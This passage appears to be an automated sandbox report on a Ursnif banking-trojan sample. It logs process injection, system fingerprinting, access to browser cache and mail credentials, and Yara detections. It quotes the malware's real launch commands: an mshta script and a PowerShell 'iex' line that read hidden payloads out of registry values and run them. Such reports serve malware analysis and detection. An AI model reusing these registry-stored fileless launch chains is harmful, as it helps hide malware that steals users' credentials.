Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\ncwpagzn\ncwpagzn.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 736E1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 736E1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 736E1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 736E1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 736E1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 736E1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 736E1580
Source: C:\Windows\System32\control.exe	Thread created: unknown EIP: 736E1580

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3388 base: 10B0000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3388 base: 7FFB736E1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3388 base: 38B0000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3388 base: 7FFB736E1580 value: 40

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Program Files\internet explorer\iexplore.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\regsvr32.exe	Thread register set: target process: 5248			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3388
Source: C:\Windows\explorer.exe	Thread register set: target process: 3668
Source: C:\Windows\explorer.exe	Thread register set: target process: 4376
Source: C:\Windows\explorer.exe	Thread register set: target process: 4588
Source: C:\Windows\explorer.exe	Thread register set: target process: 4652
Source: C:\Windows\explorer.exe	Thread register set: target process: 5976
Source: C:\Windows\explorer.exe	Thread register set: target process: 5408
Source: C:\Windows\explorer.exe	Thread register set: target process: 1932
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3388
Source: C:\Windows\System32\control.exe	Thread register set: target process: 5540

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6B83612E0			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6B83612E0			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 10B0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFB736E1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 38B0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFB736E1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 6E40E00000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FC13800000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF79A2B5FD0
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 1C73EDD0000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF79A2B5FD0

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1rpmo52x\1rpmo52x.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ncwpagzn\ncwpagzn.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4C68.tmp' 'c:\Users\user\AppData\Local\Temp\1rpmo52x\CSCD915EAFD191245B3934D90CF529F8C8.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5C37.tmp' 'c:\Users\user\AppData\Local\Temp\ncwpagzn\CSC5C637C2C8A1A47B595CDB8114288746.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 00000021.00000000.337121436.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000021.00000002.475809683.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.475841221.000001FC11790000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000021.00000000.352386723.0000000006860000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.475841221.000001FC11790000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000021.00000002.475809683.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.475841221.000001FC11790000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000021.00000002.475809683.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.475841221.000001FC11790000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00DA5F3A cpuid

1_2_00DA5F3A

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Contains functionality to query local / system time

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00DA6204 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

1_2_00DA6204

Contains functionality to query the account / user name

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00DA5F3A RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

1_2_00DA5F3A

Contains functionality to query windows version

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00DA3C98 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

1_2_00DA3C98

Queries the cryptographic machine GUID

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.223302153.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.367530874.0000000000870000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.354944479.0000000003290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.359558033.000001C73EF40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223173765.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223209468.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223261296.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223239089.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336440905.00000000008A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.479961254.000001FC13595000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223385631.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223396967.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.361030541.000001C73F145000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.360941487.0000000000C25000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.333669010.000001D9B67B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223326462.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.345685075.000001EFE0D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.280179571.0000000004F3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5348, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2344, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5248, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5540, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000003
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000006
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000007
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000008
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000009

Tries to steal Mail credentials (via file access)

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.223302153.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.367530874.0000000000870000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.354944479.0000000003290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.359558033.000001C73EF40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223173765.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223209468.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223261296.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223239089.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336440905.00000000008A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.479961254.000001FC13595000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223385631.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223396967.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.361030541.000001C73F145000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.360941487.0000000000C25000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.333669010.000001D9B67B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223326462.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.345685075.000001EFE0D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.280179571.0000000004F3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5348, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2344, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5248, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5540, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY